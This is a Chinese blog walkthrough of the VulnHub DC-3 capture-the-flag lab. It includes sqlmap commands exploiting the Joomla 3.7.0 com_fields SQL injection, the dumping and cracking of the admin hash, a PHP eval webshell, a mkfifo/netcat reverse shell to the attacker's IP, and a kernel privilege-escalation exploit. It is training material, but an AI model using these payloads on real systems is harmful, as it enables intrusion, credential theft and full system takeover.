首页 > 其他分享 >dc-3详细分解

dc-3详细分解

时间:2024-10-10 14:48:42浏览次数:7  
标签:http -- 扫描 dc 192.168 分解 详细 66.142 com

一、环境搭建:

1、靶场描述

DC-3是另一个专门建立的易受攻击的实验室,旨在获得渗透测试领域的经验。与之前的DC版本一样,这个版本是为初学者设计的,尽管这一次只有一个标志,一个入口点,根本没有线索。必须具备Linux技能并熟悉Linux命令行,还必须具有使用基本渗透测试工具的经验。对于初学者来说,谷歌可以提供很大的帮助,但你可以随时在@DCAu7上推我让你重新开始。但请注意:我不会给你答案,相反,我会给你一个如何前进的想法。对于那些有CTF和Boot2Root挑战经验的人来说,这可能不会花你很长时间(事实上,它可能只需要不到20分钟)。如果是这种情况,如果你想让它更具挑战性,你可以重做挑战,探索其他获得根和获得旗帜的方法。

只有一个flag

2、下载靶场环境

    靶场下载地址:

https://www.vulnhub.com/entry/dc-32,312/

二、渗透靶场

1、目标:

    目标就是我们搭建的靶场,靶场IP为:192.168.66.0/24

2、信息收集:寻找靶机真实IP

nmap -sP 192.168.65.130/24

   本机ip为192.168.66.139

    所以分析可得靶机ip为192.168.66.142

192.168.66.1 vm8网卡

192.168.66.2 网关

192.168.66.142 靶机

192.168.66.254 DHCP服务器

192.168.66.139 kali本机

3、信息收集:探端口及服务

nmap -A -p- -v 192.168.66.142

-A 综合性扫描

-v 冗余模式。强烈推荐使用这个选项,它会给出扫描过程中的详细信息

他告诉我们这次DC-3实战只有一个目标获得root权限

5、利用JoomScan进行扫描获取后台地址

    由于我们前面采用nmap进行扫描时我们已经发现了中间件为joomla,我们可以采用joomscan进行扫描,如果我们不知道是joomla,我们可以采用目录扫描或者nikto等扫描工具进行扫描。发现更多的信息。

1.JoomScan简介

OWASPJoomla!漏洞扫描器(JoomScan)是一个开源项目,其主要目的是实现漏洞检测的自动化,以增强Joomla CMS开发的安全性。该工具基于Perl开发,能够轻松无缝地对各种Joomla项目进行漏洞扫描,其轻量化和模块化的架构能够保证扫描过程中不会留下过多的痕迹。它不仅能够检测已知漏洞,而且还能够检测到很多错误配置漏洞和管理权限漏洞等等。除此之外,OWASP JoomScan使用起来非常简单,不仅提供了非常友好的用户界面,而且还能够以HTML或文本格式导出扫描报告。

2.JoomScan简单使用

执行默认检测:

perl joomscan.pl --url www.example.com

perl joomscan.pl -u www.example.com

枚举已安装的组件:

perl joomscan.pl --url www.example.com --enumerate-components

perl joomscan.pl -u www.example.com –ec

设置cookie:

perl joomscan.pl --url www.example.com --cookie "test=demo;"

设置user-agent:

perl joomscan.pl --url www.example.com --user-agent "Googlebot/2.1(+http://www.googlebot.com/bot.html)"

perl joomscan.pl -u www.example.com -a "Googlebot/2.1(+http://www.googlebot.com/bot.html)"

设置随机user-agent

perl joomscan.pl -u www.example.com --random-agent

perl joomscan.pl --url www.example.com -r

更新JoomScan:

perl joomscan.pl –update

3.joomScan扫描

joomscan --url http://192.168.66.142  提示没有joomscan 选择y安装

扫描结果如下

知道了joomla cms版本为3.7.0
得到了网站后台地址​​​​​​http://192.168.66.142/administrator/

6、利用nikto扫描获取后台地址

1.Nikto简介

    Nikto是一个开源的WEB扫描评估软件,可以对Web服务器进行多项安全测试,能在230多种服务器上扫描出 2600多种有潜在危险的文件、CGI及其他问题。Nikto可以扫描指定主机的WEB类型、主机名、指定目录、特定CGI漏洞、返回主机允许的 http模式等。

2.Nikto简单使用

1、常规扫描

nikto -host/-h http://127.0.0.1

nikto -h http://127.0.0.1

2、可以指定端口进行扫描,同样可以指定SSL协议,进行HTTPS扫描。

nikto -h http:// 127.0.0.1 -p 443 ssl

3、指定子目录进行目录爆破

nikto -h http:// 127.0.0.1 -C /dvwa

4、批量扫描

nikto -host list.txt

5、升级更新插件

nikto -update

6、查看工具版本和插件版本

nikto -V

7、查看插件信息

nikto -list-plugins

8、命令查看帮助信息

nikto

9、查看更详细的帮助信息

nikto -H

man nikto

3.Nikto扫描

    我们前面已经知道了CMS是joomla,并且知道了后台地址,针对于这一个靶场这一步没有任何意义,这里只是提供一个思路,目录扫描,这里就不拓展了。

nikto --url ​​​​​​http://192.168.66.142/

7、查找漏洞发现存在SQL注入

    我们前面知道了CMS为joomla,版本为3.7.0

使用searchsploit检查到有对应的漏洞

searchsploit joomla 3.7.0

我们发现有一个SQL注入,还存在一个XSS

我们可以看一下这个漏洞的提示信息

searchsploit -m 42033.txt

我们看到了POC,我们验证一下,把localhost修改为我们的靶机IP就ok

http://192.168.66.142/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27

看到提示,数据库语句错误,说明进行了拼接,存在SQL注入

8、sqlmap跑出数据

1.跑出所有数据库

sqlmap -u "http://192.168.66.142/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] –batch

扫描结果
成功把数据库跑出来了

sqlma2.获取当前数据库的名字joomladb

p -u "http://192.168.66.142/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] --current-db –batch

sqlmap -u "http://192.168.66.142/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 -p list[fullordering] -D "joomladb" --tables --batch

 观察表名,很明显,我们会关注#__users这张表

4.获取joomladb的users表的字段名

sqlmap -u "http://192.168.66.142/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 -p list[fullordering] -D "joomladb" --tables -T "#__users" --columns

第一个选项,直接回车使用默认的“Y”


最终跑出来6个字段

5.获取目标字段username和password

sqlmap -u "http://192.168.66.142/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 -p list[fullordering] -D "joomladb" --tables -T "#__users" --columns -C "username,password" --dump --batch

获得结果如下
拿到一个用户名和加密的密码

利用john爆破密码snoopy

    使用john破解出admin密码,john the ripper是一款本地密码破解工具,可以从我们上面生成的shadow文件(密码散列)中破解出密码。破解时间取决于密码的复杂程度以及破解模式。

创建一个1.txt,把加密的密码字段写入

使用john破解出admin密码是snoopy

10.利用获取到的账号密码进行登录

http://192.168.66.142/administrator/

admin/snoopy

登陆成功

11.上传webshell

    发现一个上传点

点击newfiles

这儿我们发现可以上传文件,考虑上传木马,也可以创建文件进行编辑

要上传木马,我们先要找到当前文件所在的目录:

http://192.168.66.142/templates/beez3/html/

回到刚才的页面点击new file
在html下创建一个php文件,名字叫做shell

 创建成功之后,跳到编辑页面,然后我们输入php一句话,点击左上角绿色的save进行保存

<?php

echo ("密码是a");

@eval($_REQUEST [a]);

?>

再次访问http://192.168.66.142/templates/beez3/html/
发现多了一个shell.php文件,我们访问一下

 访问webshell,得到我们设置的会先内容,文件上传成功

http://192.168.65.130/templates/beez3/html/shell.php

蚁剑管理webshell

    右键添加数据

右键进入虚拟终端执行whaomi查询我权限,是www-data权限

13.反弹shell到kali

    蚁剑看到的终端不如kali清晰,反弹一个shell到kali

1.kali监听

nc -lvvp 1234

2.靶机连接

nc -e /bin/bash 192.168.66.139 1234(第一个ip)

发现-e参数不可用

使用如下目录连接

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.66.139 1234 >/tmp/f(第一个ip)

14.创建交互式shell

    经常用shell的都知道这个shell不好用,我们建立一个交互式shell

    常用的就是python创建交互式shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

15.使用辅助脚本发现提权漏洞

1.下载辅助脚本Linux-Exploit-Suggester.sh

    下载地址:

GitHub - The-Z-Labs/linux-exploit-suggester: Linux privilege escalation auditing tool

2.上传辅助脚本

    我们直接在蚁剑中上传

上传成功

3.发现漏洞

ls -l linux-exploit-suggester.sh

现没有执行权限,我们给他加个执行文件

chmod +x linux-exploit-suggester.sh

 执行脚本

./linux-exploit-suggester.sh

发现很多可利

可以使用下面地址直接下载

bin-sploits/39772.zip · main · Exploit-DB / Binary Exploits · GitLab

3.提权

    解压文件

unzip 39772.zip

cd 33792

ls

tar -xvf exploit.tar

cd ebpf_mapfd_doubleput_exploit

./compile.sh

./doubleput

执行完之后,提权成功

获得root权限

16.发现the-flag.txt

ls

cat the-flag.txt

标签:http,--,扫描,dc,192.168,分解,详细,66.142,com
From: https://blog.csdn.net/shshwjwj/article/details/142792223

相关文章

  • 引领行业数字变革,天翼云出席IDC年度盛典暨颁奖典礼!
    近日,2024IDC中国年度盛典暨颁奖典礼在上海隆重开幕。天翼云出席大会数字工业行业峰会及金融行业峰会,分享了天翼云的智算布局及在行业数字化转型方面的技术探索和实践成果。天翼云全面升级产品及生态矩阵,迈入智能云的新发展阶段。天翼云积极布局智算产业,提供丰富的智能资源供......
  • SciPy的详细学习要点
    SciPy是一个开源的Python科学计算库,它建立在NumPy数组对象之上,提供了许多科学和工程计算中常用的函数和工具。以下是学习SciPy时的一些详细要点:1.理解SciPy与NumPy的关系-SciPy是基于NumPy构建的,因此熟练掌握NumPy是使用SciPy的前提。SciPy的很多操作都是基于NumPy数组进行......
  • 淘宝图片搜索商品数据api接口对接详细的描述和解释
    淘宝图片搜索商品数据接口是一项高级的API服务,它允许用户通过上传图片来搜索淘宝上的商品。这一功能依托于先进的图像识别技术,通过复杂的算法对上传的图片进行分析和处理,从而找到与图片相似的商品。以下是对该接口的详细描述和解释:主要功能、特点、优势主要功能:以图搜图......
  • 稀疏促进动态模态分解(SPDMD)详细介绍以及应用
    在数据驱动分析领域,从复杂流体流动中提取有意义的模式一直是一个重大挑战。稀疏促进动态模态分解(SparsityPromotingDynamicModeDecomposition,SPDMD)提供了一种有效方法,能够揭示最主要的特征,同时去除冗余信息,从而实现更高效和更具洞察力的分解。这种方法将动态模态分解(Dynamic......
  • UpdatePack7R2 24.10.10 参数详细说明及示例
    UpdatePack7R224.10.10使用示例以下是一些使用UpdatePack7R2的示例命令:自动安装所有更新,包括InternetExplorer11,并重启计算机:CopyCodeUpdatePack7R2.exe/ie11/silent/reboot隐藏所有现有产品的更新,不更改InternetExplorer的版本,并且不重启计算机:CopyCode......
  • 一文详细解读自动驾驶与机器人所需各种传感器的原理与优缺点
    更多优质内容,请关注公众号:智驾机器人技术前线1.激光雷达(LiDAR)工作原理:激光雷达通过发射短脉冲的激光束,测量光束从目标物体反射回来所需的时间(即飞行时间),从而计算出物体的距离。LiDAR通常通过旋转激光发射器来获取360度的视场,生成点云数据,反映周围环境的三维信息。优势:高......
  • 运维工程师一月多少钱(非常详细),零基础入门到精通,看这一篇就够了
    前言运维工程师的月薪因地区、工作经验、技能水平及公司规模等因素而有所不同。根据多个来源的数据,我们可以对运维工程师的月薪进行大致的归纳和分析:一、全国平均月薪*整体平均月薪:根据看准网的数据,2024年运维工程师在全国的平均月薪约为¥16,052,中位数为¥13,030至¥1......
  • IPv6详细记录
    一、地址格式书写方式:    使用“:”分隔,16进制表示,共有8组    地址总长为128bit,每一组16bit,也就是4个十六进制的数(四个二进制数表示一个十六进制数)编写格式:    可以省略每一组的前导0    如果一组所有位都为0可以化简为单个0,如果出现连......
  • 连分数分解(心情不好,爬起,遂有此烂文)
    关于标题今晚的月色深藏云间。(呜呜呜我就是在发癫)连分数分解问题和勒让德定理关系较多,至少知道什么是连分数什么是勒让德定理。维纳攻击wienerattack 攻击条件:攻击原理:适用情况和例题出现多因子+大数时考虑连分数分解[湖湘杯2021]signin附件:fromCrypto.Util.num......
  • ElasticSearch7.17.3简介+centos7详细安装教程+Springboot整合ES
    一、ElasticSearch简介    官方地址:Elasticsearch:官方分布式搜索和分析引擎|Elastic1.1ElasticSearch简介        Elasticsearch是一个分布式、RESTful风格的搜索和数据分析引擎,同时是可扩展的数据存储和矢量数据库,能够应对日益增多的各种用例。作为......